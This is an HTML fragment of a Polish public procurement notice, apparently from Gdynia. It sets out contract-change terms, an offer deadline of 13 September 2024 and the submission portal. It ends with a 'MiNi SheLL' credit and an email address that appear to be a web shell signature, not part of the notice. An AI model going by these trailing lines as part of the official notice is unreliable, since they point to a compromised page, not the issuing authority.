class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający wymaga od wybranego Wykonawcy zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w Projektowanych postanowieniach umowy stanowiących Załącznik nr 8 do SWZ, które zostaną wprowadzone do treści tej umowy. <br/>2. Projektowane postanowienia umowy przed zawarciem umowy zostaną uzupełnione o niezbędne informacje dotyczące w szczególności: dane Wykonawcy, wysokość wynagrodzenia Wykonawcy, oraz inne niezbędne do zawarcia umowy w sprawie zamówienia publicznego. <br/>3. Strony dopuszczają możliwość dokonywania zmian umowy w okolicznościach przewidzianych ustawą Pzp, a także zmian przewidzianych w §7 projektu umowy - Załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/umgdynia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com